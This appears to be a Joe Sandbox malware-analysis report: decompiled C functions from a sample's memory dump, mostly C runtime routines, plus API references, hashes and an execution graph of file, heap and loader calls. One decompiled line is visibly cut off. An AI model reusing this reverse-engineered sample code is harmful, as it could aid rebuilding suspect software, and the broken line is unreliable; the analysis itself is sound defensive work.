              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
              • String ID:
              • API String ID: 2772871689-0
              • Opcode ID: 8d6748c4b0b5d18005011c8eead7495842b3154eda36777b89fbb00ae4c9b7c1
              • Instruction ID: 2958a021a691dcd6b18f8b9739dc229ccbab23f6871ba39901228fd0587c188c
              • Opcode Fuzzy Hash: 8d6748c4b0b5d18005011c8eead7495842b3154eda36777b89fbb00ae4c9b7c1
              • Instruction Fuzzy Hash: 3481D4719052458FCB24CF79C8419EDBBF0AF09324B24A26DE4A6BB3D1D7349983CB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E13825 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
              Download Yara Rule
              C-Code - Quality: 91%
              			E00E13825(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00E118A0(_t3);
				if(E00E14570() != 0) {
					_t6 = E00E14011(E00E135B6);
					 *0xe2350c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00E14879(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00E1389B();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00E1406D( *0xe2350c, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00E13772(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00E1389B();
					return 0;
				}
			}








              0x00e13825
              0x00e13831
              0x00e13840
              0x00e13845
              0x00e1384b
              0x00e1384e
              0x00000000
              0x00e13850
              0x00e1385d
              0x00e13861
              0x00e13863
              0x00e13892
              0x00e13892
              0x00e13897
              0x00e1389a
              0x00e13865
              0x00e13873
              0x00e13875
              0x00000000
              0x00e13877
              0x00e13877
              0x00e13879
              0x00e1387a
              0x00e13881
              0x00e13887
              0x00e1388b
              0x00e1388f
              0x00e13891
              0x00e13891
              0x00e13875
              0x00e13863
              0x00e13833
              0x00e13833
              0x00e13833
              0x00e1383a
              0x00e1383a

              APIs
              • __init_pointers.LIBCMT ref: 00E13825
                • Part of subcall function 00E118A0: RtlEncodePointer.NTDLL(00000000,?,00E1382A,00E1164A,00E22190,00000014), ref: 00E118A3
                • Part of subcall function 00E118A0: __initp_misc_winsig.LIBCMT ref: 00E118BE
                • Part of subcall function 00E118A0: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E14127
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E1413B
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E1414E
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E14161
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E14174
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E14187
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E1419A
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E141AD
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E141C0
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E141D3
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E141E6
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E141F9
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E1420C
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E1421F
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E14232
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E14245
              • __mtinitlocks.LIBCMT ref: 00E1382A
              • __mtterm.LIBCMT ref: 00E13833
                • Part of subcall function 00E1389B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E13838,00E1164A,00E22190,00000014), ref: 00E1448A
                • Part of subcall function 00E1389B: _free.LIBCMT ref: 00E14491
                • Part of subcall function 00E1389B: DeleteCriticalSection.KERNEL32(XK,?,?,00E13838,00E1164A,00E22190,00000014), ref: 00E144B3
              • __calloc_crt.LIBCMT ref: 00E13858
              • __initptd.LIBCMT ref: 00E1387A
              • GetCurrentThreadId.KERNEL32 ref: 00E13881
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
              • String ID:
              • API String ID: 3567560977-0
              • Opcode ID: dab6a8b8ca977ad1e110b7982529c384c8eb8a478b773363a914816a1dbf1a18
              • Instruction ID: 529ad6d4e10df530e88ead8e88d8a4bcef86403103d4ad6fbb5532aa8f76deca
              • Opcode Fuzzy Hash: dab6a8b8ca977ad1e110b7982529c384c8eb8a478b773363a914816a1dbf1a18
              • Instruction Fuzzy Hash: 36F0B4B25183211EE23C7B757C076CA2BC19F41B74B21A62AF565F92D2FF51CAC24A90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E191D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E00E191D6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00E14C0C( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00E1918B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00E11CD3();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















              0x00e191de
              0x00e191e3
              0x00e191fd
              0x00000000
              0x00e191fd
              0x00e191e5
              0x00e191ea
              0x00000000
              0x00000000
              0x00e191ef
              0x00e1920c
              0x00e19211
              0x00e19214
              0x00e1921b
              0x00e1923a
              0x00e19241
              0x00e19243
              0x00e19287
              0x00e19293
              0x00e19296
              0x00e1929b
              0x00e1929e
              0x00e192a4
              0x00e192a6
              0x00e192b6
              0x00e192b6
              0x00e192ba
              0x00e192bc
              0x00e192bf
              0x00e192bf
              0x00e192bf
              0x00e192bf
              0x00000000
              0x00e192c5
              0x00e192a8
              0x00e192a8
              0x00e192ad
              0x00e192ad
              0x00e192b0
              0x00000000
              0x00e192b0
              0x00e19245
              0x00e19248
              0x00e1924c
              0x00e19275
              0x00e19275
              0x00e19275
              0x00e19278
              0x00e19278
              0x00000000
              0x00000000
              0x00e1927a
              0x00e1927e
              0x00000000
              0x00000000
              0x00e19280
              0x00e19280
              0x00e19280
              0x00000000
              0x00e19280
              0x00e1924e
              0x00e1924e
              0x00e19251
              0x00000000
              0x00000000
              0x00e19255
              0x00e1925f
              0x00e19265
              0x00e19268
              0x00e1926e
              0x00e19271
              0x00e19273
              0x00000000
              0x00000000
              0x00000000
              0x00e19273
              0x00e1921d
              0x00e19220
              0x00e19222
              0x00e19227
              0x00e19227
              0x00e1922c
              0x00000000
              0x00e1922c
              0x00e191f1
              0x00e191f6
              0x00e191fa
              0x00e191fa
              0x00000000

              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E1920C
              • __isleadbyte_l.LIBCMT ref: 00E1923A
              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00E19268
              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00E1929E
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID: Ha
              • API String ID: 3058430110-1493737000
              • Opcode ID: b1bf98f25da37ee0f2c22274128a808cb164313fd09105a7d9dfc5342ff17b94
              • Instruction ID: 125f5428a789225493ff3e53c0835534989de83673c38399f674e3e39fb3c75e
              • Opcode Fuzzy Hash: b1bf98f25da37ee0f2c22274128a808cb164313fd09105a7d9dfc5342ff17b94
              • Instruction Fuzzy Hash: F531D03160024ABFDB218E65DC54BFA7BE5FF41324F155528F825A71A2D730D8D0DB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E17462 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 95%
              			E00E17462(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0xe24834, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0xe24830 == _t7) {
									_t9 = E00E11CD3();
									 *_t9 = E00E11CE6(GetLastError());
									goto L17;
								} else {
									if(E00E11751(_t7, _t31) == 0) {
										_t12 = E00E11CD3();
										 *_t12 = E00E11CE6(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00E11751(_t6, _t31);
						 *((intOrPtr*)(E00E11CD3())) = 0xc;
						goto L12;
					} else {
						E00E14841(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00E11151(__ebx, __edx, __edi, _a8);
				}
			}









              0x00e17469
              0x00e17477
              0x00e1747c
              0x00e1748b
              0x00e174be
              0x00e17490
              0x00e17492
              0x00e17492
              0x00e1749f
              0x00e174a5
              0x00e174a9
              0x00e17509
              0x00e17509
              0x00e174ab
              0x00e174b1
              0x00e174f3
              0x00e17507
              0x00000000
              0x00e174b3
              0x00e174bc
              0x00e174db
              0x00e174ef
              0x00e174d5
              0x00e174d5
              0x00000000
              0x00000000
              0x00000000
              0x00e174bc
              0x00e174b1
              0x00000000
              0x00e174d7
              0x00e174c4
              0x00e174cf
              0x00000000
              0x00e1747e
              0x00e17481
              0x00e17487
              0x00e17487
              0x00e174d8
              0x00e174da
              0x00e1746b
              0x00e17475
              0x00e17475

              APIs
              • _malloc.LIBCMT ref: 00E1746E
                • Part of subcall function 00E11151: __FF_MSGBANNER.LIBCMT ref: 00E11168
                • Part of subcall function 00E11151: __NMSG_WRITE.LIBCMT ref: 00E1116F
                • Part of subcall function 00E11151: RtlAllocateHeap.NTDLL(00B50000,00000000,00000001,00000000,00000000,00000000,?,00E148D7,00000000,00000000,00000000,00000000,?,00E14509,00000018,00E22280), ref: 00E11194
              • _free.LIBCMT ref: 00E17481
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: AllocateHeap_free_malloc
              • String ID:
              • API String ID: 1020059152-0
              • Opcode ID: fde00b9ef8e8c56fe1f4fb246e61f3c3affb25cbb129e212f2301da78865733a
              • Instruction ID: fdb8bdce638781f931dc4c01639e15a75793aeaff45d74b0f0adafd60c927542
              • Opcode Fuzzy Hash: fde00b9ef8e8c56fe1f4fb246e61f3c3affb25cbb129e212f2301da78865733a
              • Instruction Fuzzy Hash: AA11E77190D2196FCB352F75AC447DA3EE46F04764B206565FA99B6290DA3088C086D0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E18BD1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00E18BD1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t4;
				void* _t15;
				void* _t17;

				_push(8);
				_push(0xe224b0);
				_t4 = E00E12410(__ebx, __edi, __esi);
				_t17 =  *0xe23d3c - 0xe23d40; // 0xe23d40
				if(_t17 != 0) {
					E00E1443F(0xc);
					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
					 *0xe23d3c = E00E173E6("@=\xef\xbf\xbd", 0x					 *(_t15 - 4) = 0xfffffffe;
					_t4 = E00E18C1A();
				}
				return E00E12455(_t4);
			}






              0x00e18bd1
              0x00e18bd3
              0x00e18bd8
              0x00e18be2
              0x00e18be8
              0x00e18bec
              0x00e18bf2
              0x00e18c03
              0x00e18c08
              0x00e18c0f
              0x00e18c0f
              0x00e18c19

              APIs
              • __lock.LIBCMT ref: 00E18BEC
                • Part of subcall function 00E1443F: __mtinitlocknum.LIBCMT ref: 00E14451
                • Part of subcall function 00E1443F: EnterCriticalSection.KERNEL32(00000000,?,00E137BB,0000000D), ref: 00E1446A
              • __updatetlocinfoEx_nolock.LIBCMT ref: 00E18BFC
                • Part of subcall function 00E173E6: ___addlocaleref.LIBCMT ref: 00E17402
                • Part of subcall function 00E173E6: ___removelocaleref.LIBCMT ref: 00E1740D
                • Part of subcall function 00E173E6: ___freetlocinfo.LIBCMT ref: 00E17421
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
              • String ID: @=$@=
              • API String ID: 547918592-965070868
              • Opcode ID: c88c94099e2aede67bb4eb9d19a68137be84662e34fdd79b24ed1f6460fa45f0
              • Instruction ID: 42f03b9cd0e85821d495f9703154dc4d23cab859f8ab9fe07709a741ef8f1e57
              • Opcode Fuzzy Hash: c88c94099e2aede67bb4eb9d19a68137be84662e34fdd79b24ed1f6460fa45f0
              • Instruction Fuzzy Hash: 8CE08671545320EAD6207B717D43BCCF2F05B00B25F50751AF164771C1CD785AC05EA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E1A95D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E00E1A95D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00E1AEAE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00E1A9E3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00E1B129(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00E1B068(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





              0x00e1a960
              0x00e1a966
              0x00e1a9d9
              0x00000000
              0x00e1a96d
              0x00e1a96d
              0x00e1a970
              0x00e1a98b
              0x00e1a98e
              0x00e1a9ae
              0x00e1a9c0
              0x00e1a990
              0x00e1a990
              0x00e1a993
              0x00000000
              0x00e1a995
              0x00e1a9a7
              0x00e1a9a7
              0x00e1a993
              0x00e1a9de
              0x00e1a9e2
              0x00e1a972
              0x00e1a98a
              0x00e1a98a
              0x00e1a970

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0
              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
              • Instruction ID: 489854a5261fd241575a117183a2f0aa3d04ed14917c035307d5b41b11fa13ae
              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
              • Instruction Fuzzy Hash: 6B014C7204114EFBCF125E84DC018EE3F67BB58354B5A9425FE1868031C336C9F1AB82
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:6.1%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:3.6%
              Total number of Nodes:590
              Total number of Limit Nodes:74
              execution_graph 22347 41f250 22350 41b9d0 22347->22350 22351 41b9f6 22350->22351 22362 409150 22351->22362 22353 41ba02 22361 41ba49 22353->22361 22370 40d760 22353->22370 22355 41ba17 22356 41ba2c 22355->22356 22418 41a660 22355->22418 22382 40ac00 22356->22382 22359 41ba3b 22360 41a660 2 API calls 22359->22360 22360->22361 22365 40915d 22362->22365 22421 4090a0 22362->22421 22364 409164 22364->22353 22365->22364 22433 409040 22365->22433 22371 40d78c 22370->22371 22828 40a600 22371->22828 22373 40d79e 22832 40d670 22373->22832 22376 40d7d1 22378 40d7e2 22376->22378 22381 41a440 2 API calls 22376->22381 22377 40d7b9 22379 40d7c4 22377->22379 22380 41a440 2 API calls 22377->22380 22378->22355 22379->22355 22380->22379 22381->22378 22383 40ac25 22382->22383 22384 40a600 LdrLoadDll 22383->22384 22385 40ac7c 22384->22385 22849 40a280 22385->22849 22387 40aef3 22387->22359 22388 40aca2 22388->22387 22858 414fe0 22388->22858 22390 40ace7 22390->22387 22861 407e10 22390->22861 22392 40ad2b 22392->22387 22878 41a4b0 22392->22878 22396 40ad81 22397 40ad88 22396->22397 22888 419fc0 22396->22888 22399 41bee0 2 API calls 22397->22399 22400 40ad95 22399->22400 22400->22359 22402 40add2 22403 41bee0 2 API calls 22402->22403 22404 40add9 22403->22404 22404->22359 22405 40ade2 22406 40d7f0 LdrLoadDll 22405->22406 22407 40ae56 22406->22407 22407->22397 22408 40ae61 22407->22408 22409 41bee0 2 API calls 22408->22409 22410 40ae85 22409->22410 22891 41a010 22410->22891 22413 419fc0 LdrLoadDll 22414 40aec0 22413->22414 22414->22387 22894 419dd0 22414->22894 22417 41a660 2 API calls 22417->22387 22419 41a67f ExitProcess 22418->22419 22420 41af60 LdrLoadDll 22418->22420 22420->22419 22422 4090b3 22421->22422 22472 418b80 LdrLoadDll 22421->22472 22452 418a30 22422->22452 22425 4090c6 22425->22365 22426 4090bc 22426->22425 22455 41b310 22426->22455 22428 409103 22428->22425 22466 408ec0 22428->22466 22430 409123 22473 408920 LdrLoadDll 22430->22473 22432 409135 22432->22365 22806 41b600 22433->22806 22436 41b600 LdrLoadDll 22437 40906b 22436->22437 22438 41b600 LdrLoadDll 22437->22438 22439 409081 22438->22439 22440 40d560 22439->22440 22441 40d579 22440->22441 22814 40a480 22441->22814 22443 40d58c 22818 41a190 22443->22818 22446 409175 22446->22353 22448 40d5b2 22449 40d5dd 22448->22449 22824 41a210 22448->22824 22450 41a440 2 API calls 22449->22450 22450->22446 22474 41a5b0 22452->22474 22456 41b329 22455->22456 22487 415690 22456->22487 22458 41b341 22459 41b34a 22458->22459 22526 41b150 22458->22526 22459->22428 22461 41b35e 22461->22459 22543 419eb0 22461->22543 22787 407210 22466->22787 22468 408ee1 22468->22430 22469 408eda 22469->22468 22800 4074d0 22469->22800 22472->22422 22473->22432 22477 41af60 22474->22477 22476 418a45 22476->22426 22478 41af6f 22477->22478 22480 41afe5 22477->22480 22478->22480 22481 415a90 22478->22481 22480->22476 22482 415a9e 22481->22482 22483 415aaa 22481->22483 22482->22483 22486 415f10 LdrLoadDll 22482->22486 22483->22480 22485 415bfc 22485->22480 22486->22485 22488 4159c5 22487->22488 22489 4156a4 22487->22489 22488->22458 22489->22488 22549 419c00 22489->22549 22492 4157d0 22552 41a310 22492->22552 22493 4157b3 22609 41a410 LdrLoadDll 22493->22609 22496 4157bd 22496->22458 22497 4157f7 22498 41bee0 2 API calls 22497->22498 22501 415803 22498->22501 22499 415989 22500 41a440 2 API calls 22499->22500 22503 415990 22500->22503 22501->22496 22501->22499 22502 41599f 22501->22502 22506 415892 22501->22506 22618 4153d0 LdrLoadDll NtReadFile NtClose 22502->22618 22503->22458 22505 4159b2 22505->22458 22507 4158f9 22506->22507 22509 4158a1 22506->22509 22507->22499 22508 41590c 22507->22508 22611 41a290 22508->22611 22511 4158a6 22509->22511 22512 4158ba 22509->22512 22610 415290 LdrLoadDll NtClose 22511->22610 22515 4158d7 22512->22515 22516 4158bf 22512->22516 22515->22503 22567 415050 22515->22567 22555 415330 22516->22555 22519 4158b0 22519->22458 22520 4158cd 22520->22458 22522 41596c 22615 41a440 22522->22615 22523 4158ef 22523->22458 22525 415978 22525->22458 22527 41b16b 22526->22527 22528 41b17d 22527->22528 22637 41be60 22527->22637 22528->22461 22530 41b19d 22640 414cb0 22530->22640 22532 41b1c0 22532->22528 22533 414cb0 3 API calls 22532->22533 22535 41b1e2 22533->22535 22535->22528 22665 415fd0 22535->22665 22536 41b26a 22537 41b27a 22536->22537 22758 41aee0 LdrLoadDll 22536->22758 22676 41ad50 22537->22676 22540 41b2a8 22755 419e70 22540->22755 22544 419ecc 22543->22544 22545 41af60 LdrLoadDll 22543->22545 22546 41bee0 22544->22546 22545->22544 22784 41a620 22546->22784 22548 41b3b9 22548->22428 22550 41af60 LdrLoadDll 22549->22550 22551 415784 22550->22551 22551->22492 22551->22493 22551->22496 22553 41a32c NtCreateFile 22552->22553 22554 41af60 LdrLoadDll 22552->22554 22553->22497 22554->22553 22556 41534c 22555->22556 22557 41a290 LdrLoadDll 22556->22557 22558 41536d 22557->22558 22559 415374 22558->22559 22560 415388 22558->22560 22561 41a440 2 API calls 22559->22561 22562 41a440 2 API calls 22560->22562 22563 41537d 22561->22563 22564 415391 22562->22564 22563->22520 22619 41c0f0 LdrLoadDll RtlAllocateHeap 22564->22619 22566 41539c 22566->22520 22568 41509b 22567->22568 22569 4150ce 22567->22569 22570 41a290 LdrLoadDll 22568->22570 22571 415219 22569->22571 22575 4150ea 22569->22575 22572 4150b6 22570->22572 22573 41a290 LdrLoadDll 22571->22573 22574 41a440 2 API calls 22572->22574 22582 415234 22573->22582 22577 4150bf 22574->22577 22576 41a290 LdrLoadDll 22575->22576 22578 415105 22576->22578 22577->22523 22580 415121 22578->22580 22581 41510c 22578->22581 22585 415126 22580->22585 22586 41513c 22580->22586 22584 41a440 2 API calls 22581->22584 22633 41a2d0 LdrLoadDll 22582->22633 22583 41526e 22587 41a440 2 API calls 22583->22587 22588 415115 22584->22588 22589 41a440 2 API calls 22585->22589 22594 415141 22586->22594 22620 41c0b0 22586->22620 22590 415279 22587->22590 22588->22523 22591 41512f 22589->22591 22590->22523 22591->22523 22603 415153 22594->22603 22623 41a3c0 22594->22623 22595 4151a7 22596 4151be 22595->22596 22632 41a250 LdrLoadDll 22595->22632 22598 4151c5 22596->22598 22599 4151da 22596->22599 22600 41a440 2 API calls 22598->22600 22601 41a440 2 API calls 22599->22601 22600->22603 22602 4151e3 22601->22602 22604 41520f 22602->22604 22627 41bcb0 22602->22627 22603->22523 22604->22523 22606 4151fa 22607 41bee0 2 API calls 22606->22607 22608 415203 22607->22608 22608->22523 22609->22496 22610->22519 22612 415954 22611->22612 22613 41af60 LdrLoadDll 22611->22613 22614 41a2d0 LdrLoadDll 22612->22614 22613->22612 22614->22522 22616 41af60 LdrLoadDll 22615->22616 22617 41a45c NtClose 22616->22617 22617->22525 22618->22505 22619->22566 22634 41a5e0 22620->22634 22622 41c0c8 22622->22594 22624 41a3c6 22623->22624 22625 41af60 LdrLoadDll 22624->22625 22626 41a3dc NtReadFile 22625->22626 22626->22595 22628 41bcd4 22627->22628 22629 41bcbd 22627->22629 22628->22606 22629->22628 22630 41c0b0 2 API calls 22629->22630 22631 41bceb 22630->22631 22631->22606 22632->22596 22633->22583 22635 41af60 LdrLoadDll 22634->22635 22636 41a5fc RtlAllocateHeap 22635->22636 